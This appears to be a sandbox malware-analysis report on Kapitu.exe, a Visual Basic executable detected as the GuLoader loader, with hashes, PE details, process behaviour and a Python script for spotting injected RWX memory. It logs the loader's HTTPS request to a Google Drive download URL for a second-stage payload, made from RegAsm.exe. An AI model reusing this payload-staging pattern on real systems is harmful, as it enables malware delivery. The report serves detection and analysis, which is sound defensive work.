              SHA-256:76655AEE6B2EA0D2870503F7101E7BE88159FBC194032E6411400C1EAE11CE69
              SHA-512:80C686D44CE6D6238723BC082AFDAE7BC9584C0C071559877988615FBF8DF42C727C593C56EF27B4AF49AEB1F2C0CC7181CA3D69850F42710340A52D40B7AA6C
              Malicious:false
              Reputation:low
              Preview: MDMP..a..... .......f.Qa..............................bJ.......(......GenuineIntel...........T.......<...X.Qa.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.9.0.4.1...5.4.6.....................................................................................................
              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF180.tmp.WERInternalMetadata.xml
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):6364
              Entropy (8bit):3.726221093864917
              Encrypted:false
              SSDEEP:96:R7IU6o7lZt3i0t6QszTYzxXTiIqw4f1OvzcuujulBZaMQUm89bIIsfztGm:R9l7lZNi0t6pYzlN4aBpDm89bIIsfzYm
              MD5:BF0431B1450429DE61AAE2F1227D870F
              SHA1:016A4DBACFB52275E9787D6C6D7580610BB98D12
              SHA-256:958FE7FAF707624A01978864515EA9E09865F753BF00A2D9E7E2DEDCFF4AF9B5
              SHA-512:66DCF438B84C50761DFAE34DB12C3001D133B05B670E6B52DDFA7406ABC0C0EC787B269C8BA38E4633274767010E6BC2867F02D54D8766E5AFCBDA753771CB54
              Malicious:false
              Reputation:low
              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.7.2.<./.P.i.
              C:\ProgramData\Microsoft\Windows\WER\Temp\WERF24C.tmp.xml
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4831
              Entropy (8bit):4.517021049579082
              Encrypted:false
              SSDEEP:48:cvIwwtl8zs/WEe702I7VFJ5WS2CfjkKs3rm8M4JfuDmgOqF0+q8oBXvOR5/ELu8W:uILf/Wp7GySPf8Jfufgv1y5au84u8rd
              MD5:7334475FBAF6479D83C63961C74E9137
              SHA1:F0F3F7A43259C96EAA73960FB4C8C1CB7366713F
              SHA-256:40677DF1FFD16F49BE05D49D4384B0172698E853CCD8A7D2C98D4844EFDAE91F
              SHA-512:411A48956C1EDBBB1184BA856A7F4F32AFB8D4FAD43EE075FF19588D281F702118E63B6519B49B8CA8A371529C9A488963B7419A6836F8E0EFE47EACF2DA0CA5
              Malicious:false
              Reputation:low
              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221284375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.2510687218535645
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Kapitu.exe
              File size:102400
              MD5:149b6bd6b0d3dd2b0fbb111632d59fcc
              SHA1:33cdaa42e1a5c1fad1aa4f38dd9ad6ea75113aa7
              SHA256:b622dbe802148305104ef456835748d2fc0d8edeffa64787c43c78bcb1914b2f
              SHA512:d2783ef1112d892b9501cf0e8ce6e74277d0d55d0eb9cd3841802381682bc1e7631389c24a2f6f297a82f406fdb6c942ae7987df96f227d00e73ebbc6d01c51f
              SSDEEP:1536:RMigxMWRwt1aaGhFNEAAF9vq/eVlQ4F5kOrpdh/:aicCQhFWfFqWlQa19d1
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L......G.................P...0...............`....@................

              File Icon

              Icon Hash:78f8d6d4ac88d0e2

              Static PE Info

              General

              Entrypoint:0x4012d4
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x47939ED5 [Sun Jan 20 19:19:49 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:1eb0aaa4f15bbd841e91215ce68e26d2

              Entrypoint Preview

              Instruction
              push 00413AA8h
              call 00007F1AD0652725h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              cmp byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              scasd
              cmp dword ptr [eax], esi
              fmulp st(7), st(0)
              and eax, 3D1FA54Eh
              inc edi
              push cs
              pop edx
              cmp bh, byte ptr [ebx+00000000h]
              add byte ptr [eax], al
              add dword ptr [eax], eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              loopne 00007F1AD065271Ah
              inc edx
              add dl, byte ptr [ebx+54h]
              push esi
              push ebx
              push ebp
              add byte ptr [ecx+00h], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              dec esp
              xor dword ptr [eax], eax
              add dword ptr [esi+eax*8], esp
              cwde
              outsb
              pop esp

              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15174 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17000 | 0x1cb8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xdc | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x14548 | 0x15000 | False | 0.564581008185 | data | 6.64813091297 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x16000 | 0x9f4 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x17000 | 0x1cb8 | 0x2000 | False | 0.264526367188 | data | 3.48286092723 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

Name | RVA | Size | Type | Language | Country
CUSTOM | 0x18b7a | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
CUSTOM | 0x185fc | 0x57e | MS Windows icon resource - 1 icon, 16x16, 8 bits/pixel | English | United States
CUSTOM | 0x1807e | 0x57e | MS Windows icon resource - 1 icon, 16x16, 8 bits/pixel | English | United States
CUSTOM | 0x17f40 | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
RT_ICON | 0x178d8 | 0x668 | dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 252, next used block 65280 | |
RT_ICON | 0x175f0 | 0x2e8 | data | |
RT_ICON | 0x174c8 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0x17498 | 0x30 | data | |
RT_VERSION | 0x17230 | 0x268 | MS Windows COFF Motorola 68000 object file | English | United States

              Imports

DLL | Import
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

              Version Infos

Description | Data
Translation | 0x0409 0x04b0
InternalName | Kapitu
FileVersion | 1.00
CompanyName | CelRox
Comments | CelRox
ProductName | CelRox
ProductVersion | 1.00
FileDescription | CelRox
OriginalFilename | Kapitu.exe

              Possible Origin

Language of compilation system | Country where language is spoken
English | United States

              Network Behavior

              Network Port Distribution

              TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 15:08:50.402720928 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.402801037 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.402980089 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.418245077 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.418298006 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.472126961 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.472280025 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.472311974 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.472326040 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.475087881 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.475250959 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.589153051 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.589210033 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.589917898 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.590042114 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.592343092 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.633951902 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.844346046 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.844538927 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.844599009 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.844757080 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.844803095 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.844964981 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.845010996 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.845056057 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20
Sep 27, 2021 15:08:50.845187902 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.852526903 CEST | 49788 | 443 | 192.168.11.20 | 142.250.186.110
Sep 27, 2021 15:08:50.852603912 CEST | 443 | 49788 | 142.250.186.110 | 192.168.11.20

              UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 15:07:53.744065046 CEST | 64665 | 53 | 192.168.11.20 | 1.1.1.1
Sep 27, 2021 15:07:53.753231049 CEST | 53 | 64665 | 1.1.1.1 | 192.168.11.20
Sep 27, 2021 15:07:53.879187107 CEST | 52090 | 53 | 192.168.11.20 | 1.1.1.1
Sep 27, 2021 15:07:54.025373936 CEST | 53 | 52090 | 1.1.1.1 | 192.168.11.20
Sep 27, 2021 15:08:44.178517103 CEST | 49241 | 53 | 192.168.11.20 | 1.1.1.1
Sep 27, 2021 15:08:44.186928034 CEST | 53 | 49241 | 1.1.1.1 | 192.168.11.20
Sep 27, 2021 15:08:50.381459951 CEST | 63357 | 53 | 192.168.11.20 | 1.1.1.1
Sep 27, 2021 15:08:50.390096903 CEST | 53 | 63357 | 1.1.1.1 | 192.168.11.20
Sep 27, 2021 15:12:36.681036949 CEST | 59667 | 53 | 192.168.11.20 | 1.1.1.1
Sep 27, 2021 15:12:36.690148115 CEST | 53 | 59667 | 1.1.1.1 | 192.168.11.20
Sep 27, 2021 15:12:57.097088099 CEST | 60360 | 53 | 192.168.11.20 | 1.1.1.1
Sep 27, 2021 15:12:57.105799913 CEST | 53 | 60360 | 1.1.1.1 | 192.168.11.20
Sep 27, 2021 15:12:58.214167118 CEST | 54318 | 53 | 192.168.11.20 | 1.1.1.1
Sep 27, 2021 15:12:58.223273993 CEST | 53 | 54318 | 1.1.1.1 | 192.168.11.20

              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 15:08:50.381459951 CEST | 192.168.11.20 | 1.1.1.1 | 0xab1d | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)

              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 15:08:50.390096903 CEST | 1.1.1.1 | 192.168.11.20 | 0xab1d | No error (0) | drive.google.com | | 142.250.186.110 | A (IP address) | IN (0x0001)
Sep 27, 2021 15:12:57.105799913 CEST | 1.1.1.1 | 192.168.11.20 | 0x3e86 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)

              HTTP Request Dependency Graph

              • drive.google.com

              HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49788 | 142.250.186.110 | 443 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-27 13:08:50 UTC | 0 | OUT | GET /uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRod HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
              Host: drive.google.com
              Cache-Control: no-cache
2021-09-27 13:08:50 UTC | 0 | IN | HTTP/1.1 404 Not Found
              Content-Type: text/html; charset=UTF-8
              x-chromium-appcache-fallback-override: disallow-fallback
              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
              Content-Security-Policy: script-src 'nonce-MvTTUjqOi+ULm6tB1JBGlA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
              Date: Mon, 27 Sep 2021 13:08:50 GMT
              Expires: Mon, 27 Sep 2021 13:08:50 GMT
              Cache-Control: private, max-age=0
              X-Content-Type-Options: nosniff
              X-Frame-Options: SAMEORIGIN
              X-XSS-Protection: 1; mode=block
              Server: GSE
              Set-Cookie: NID=511=abKi0BWgcemcd0d8wm9mOlAU2B3arxsDTzzIYttMhyEZI6BWiC6XRhQKgWHtgX8WrOJul08K92QFhtYs9xjnosQK86HWAE8VXopjAbsMkP7rWufpF19a4IJLb_GGIG6TaDkuZEY-t6WXx_m0czyrRfhtLyX5RoUF5UVTrZ9K2D8; expires=Tue, 29-Mar-2022 13:08:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
              Accept-Ranges: none
              Vary: Accept-Encoding
              Connection: close
              Transfer-Encoding: chunked
2021-09-27 13:08:50 UTC | 1 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30
Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#00000
2021-09-27 13:08:50 UTC | 1 | IN | Data Raw: 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
Data Ascii: 0"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
2021-09-27 13:08:50 UTC | 1 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



              System Behavior

              General

              Start time:15:07:55
              Start date:27/09/2021
              Path:C:\Users\user\Desktop\Kapitu.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\Kapitu.exe'
              Imagebase:0x400000
              File size:102400 bytes
              MD5 hash:149B6BD6B0D3DD2B0FBB111632D59FCC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Reputation:low

              General

              Start time: 15:08:24
              Start date: 27/09/2021
              Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
              Wow64 process (32bit): true
              Commandline: 'C:\Users\user\Desktop\Kapitu.exe'
              Imagebase: 0xc80000
              File size: 53248 bytes
              MD5 hash: A64DACA3CFBCD039DF3EC29D3EDDD001
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.18979643782.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.18969783001.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
              Reputation: low
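The dump names on the Yara lines encode where the matched bytes live. Read against every dump listed on this page, the dotted fields line up as process index, a stage number, a sequence number, the region base address, the page protection as a Win32 PAGE_* value, and a type field; that field assignment is an assumption made for this example, not documentation from Joe Sandbox. Under that reading the GuLoader hits sit in RegAsm.exe at 0x01100000 in a region with protection 0x40 (PAGE_EXECUTE_READWRITE) that the Disassembly section marks as not based on a PE: writable, executable memory with no image backing, inside a process whose path is RegAsm.exe but whose command line is the original Kapitu.exe. The script below is an added example, not tool output. It parses dump names from lines copied off this page and flags executable regions that are also writable or image-less, which is the triage a responder runs over a full dump list to find injected code.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Win32 page protections (winnt.h). The low byte holds exactly one of these; 0x100 and
# above are modifier flags.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE_MASK = 0xF0  # the four PAGE_EXECUTE* values
WRITABLE_MASK = 0xCC    # READWRITE, WRITECOPY, EXECUTE_READWRITE, EXECUTE_WRITECOPY

# Dump names as printed in the report, e.g.
#   00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp
# ASSUMPTION for this example: field 1 = process index, field 4 = region base,
# field 5 = Win32 page protection. The other fields are captured but not interpreted.
DUMP_NAME_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<kind>[0-9A-Fa-f]{8})\.sdmp"
)
PE_BACKED_RE = re.compile(r"based on PE:\s*(true|false)", re.IGNORECASE)

# Lines copied from this report: process 1 is Kapitu.exe, process 5 is RegAsm.exe.
SAMPLE_DUMP_LINES = [
    "Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, "
    "Offset: 00400000, based on PE: true",
    "Associated: 00000001.00000002.17008506922.0000000000416000.00000004.00020000.sdmp",
    "Source File: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, "
    "Offset: 01100000, based on PE: false",
    "Source: 00000005.00000000.18979643782.0000000001100000.00000040.00000001.sdmp",
]


@dataclass
class DumpRegion:
    process_index: int
    base: int
    protect: int
    based_on_pe: Optional[bool]  # None when the line carries no "based on PE" field
    name: str


def parse_dump_line(line: str) -> DumpRegion:
    """Extract the region facts from one 'Source File' / 'Associated' / Yara 'Source' line."""
    m = DUMP_NAME_RE.search(line)
    if not m:
        raise ValueError(f"no .sdmp name found in {line!r}")
    pe = PE_BACKED_RE.search(line)
    return DumpRegion(
        process_index=int(m["proc"]),
        base=int(m["base"], 16),
        protect=int(m["prot"], 16),
        based_on_pe=(pe.group(1).lower() == "true") if pe else None,
        name=m.group(0),
    )


def decode_protection(value: int) -> str:
    """Render a protection value as its PAGE_* name(s), e.g. 0x104 -> PAGE_READWRITE|PAGE_GUARD."""
    names = [PAGE_PROTECTIONS.get(value & 0xFF, f"0x{value & 0xFF:02x}")]
    names += [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join(names)


def flag_reasons(region: DumpRegion) -> List[str]:
    """Why an executable region deserves a closer look; an empty list means nothing unusual."""
    reasons: List[str] = []
    if not region.protect & EXECUTABLE_MASK:
        return reasons
    if region.protect & WRITABLE_MASK:
        reasons.append("executable and writable (RWX)")
    if region.based_on_pe is False:
        reasons.append("executable but not backed by a PE image")
    return reasons


def triage(lines: List[str]) -> List[Tuple[DumpRegion, List[str]]]:
    """Parse every dump line and keep only the regions that trip a flag."""
    findings = []
    for line in lines:
        region = parse_dump_line(line)
        reasons = flag_reasons(region)
        if reasons:
            findings.append((region, reasons))
    return findings


if __name__ == "__main__":
    for region, reasons in triage(SAMPLE_DUMP_LINES):
        print(f"process {region.process_index} base 0x{region.base:08x} "
              f"{decode_protection(region.protect)}: {'; '.join(reasons)}")
```

On the lines above, Kapitu.exe's own .text dump (0x401000, PAGE_EXECUTE_READ, PE-backed) passes quietly and only the 0x01100000 region in process 5 is reported, once for RWX and once for lacking an image. Yara lines carry no "based on PE" field, so the second sample from them is flagged on protection alone; a region whose backing is unknown is not assumed clean.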

              General

              Start time: 15:08:24
              Start date: 27/09/2021
              Path: C:\Windows\System32\conhost.exe
              Wow64 process (32bit): false
              Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase: 0x7ff73c180000
              File size: 875008 bytes
              MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: C, C++ or other language
              Reputation: low

              General

              Start time: 15:12:48
              Start date: 27/09/2021
              Path: C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit): true
              Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356
              Imagebase: 0x7ff79c420000
              File size: 482640 bytes
              MD5 hash: 40A149513D721F096DDF50C04DA2F01F
              Has elevated privileges: true
              Has administrator privileges: true
              Programmed in: Visual Basic
              Reputation: low

              Disassembly

              Code Analysis


                Executed Functions

                APIs
                • __vbaChkstk.MSVBVM60(?,00401196), ref: 004143EE
                • #648.MSVBVM60(0000000A), ref: 00414445
                • __vbaFreeVar.MSVBVM60 ref: 00414452
                • #593.MSVBVM60(0000000A), ref: 00414471
                • __vbaFreeVar.MSVBVM60 ref: 0041447D
                • __vbaOnError.MSVBVM60(000000FF), ref: 0041448C
                • __vbaOnError.MSVBVM60(00000000), ref: 0041449B
                • #582.MSVBVM60(00000000,00000000), ref: 004144AC
                • __vbaFpR8.MSVBVM60 ref: 004144B2
                • #541.MSVBVM60(0000000A,15:15:15), ref: 004144D9
                • __vbaStrVarMove.MSVBVM60(0000000A), ref: 004144E3
                • __vbaStrMove.MSVBVM60 ref: 004144EE
                • __vbaFreeVar.MSVBVM60 ref: 004144F7
                • __vbaNew2.MSVBVM60(00414150,004162D4), ref: 00414517
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041413C,00000014), ref: 0041457D
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00414160,000000D8), ref: 004145E0
                • __vbaStrMove.MSVBVM60 ref: 00414611
                • __vbaFreeObj.MSVBVM60 ref: 0041461A
                • #532.MSVBVM60(Specting7), ref: 0041462C
                • __vbaHresultCheckObj.MSVBVM60(?,?,0041403C,000006F8), ref: 00414701
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041400C,000002B4), ref: 00414755
                • #595.MSVBVM60(00004003,00000000,0000000A,0000000A,?), ref: 0041481B
                • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,?), ref: 0041482F
                • __vbaFreeStr.MSVBVM60(00414884), ref: 00414874
                • __vbaFreeStr.MSVBVM60 ref: 0041487D
                Memory Dump Source
                • Source File: 00000001.00000002.17008380650.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.17008341340.0000000000400000.00000002.00020000.sdmp
